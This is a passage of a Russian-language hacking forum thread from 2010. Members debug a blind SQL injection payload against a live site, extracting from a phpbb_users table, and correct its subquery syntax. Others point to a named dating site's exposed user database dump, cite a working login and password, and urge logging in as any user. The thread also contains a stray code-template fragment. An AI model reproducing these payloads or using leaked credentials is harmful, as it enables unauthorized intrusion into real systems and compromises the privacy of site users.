
26.12.2010, 21:48
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
С нами:
8994048
Репутация:
0
|
|
Сообщение от попугай
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!
|
|
|

26.12.2010, 21:52
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами:
10358246
Репутация:
378
|
|
делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5
но когда пытаюсь выбрать из базы:
(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))
вылазит ошибка
Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1
в чем проблема?
|
|
|

26.12.2010, 21:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
InferNo23
подзапрос select надо взять в скобки
SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
|
|
|

26.12.2010, 22:14
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами:
10358246
Репутация:
378
|
|
Сообщение от Konqi
InferNo23
подзапрос select надо взять в скобки
SUBSTRING(
(
select+1+from+phpbb_users+limit+0,1
)
,1 ,1))=53,1,-1))
(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))
теперь
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
|
|
|

26.12.2010, 22:15
|
|
Участник форума
Регистрация: 09.07.2010
Сообщений: 276
С нами:
8338646
Репутация:
16
|
|
Сообщение от None
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Сообщение от None
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
" if author else f"
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Сообщение от None
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Вродь дернули на 1337db.com, но сайт тоже не отвечает.
Следите за ихним твиттером, возможно, объявятся еще.
|
|
|

26.12.2010, 22:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
InferNo23
так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.
ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?
зачем посимвольно..
|
|
|

27.12.2010, 15:26
|
|
Новичок
Регистрация: 07.10.2010
Сообщений: 0
С нами:
8209046
Репутация:
0
|
|
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
|
|
|

27.12.2010, 15:35
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Сообщение от Dagger
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки
|
|
|

27.12.2010, 15:42
|
|
Новичок
Регистрация: 07.10.2010
Сообщений: 0
С нами:
8209046
Репутация:
0
|
|
Сообщение от Kusto
странно- там дамп БД юзерей в плейнтексте
trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
|
|
|

27.12.2010, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Dagger
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
тебе сколько лет дитё? распечатай на принтере все, раз дамп открыть не можешь
ЗЫ. потом маркером будешь подчеркивать, зеленым логины и красным пароли..
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|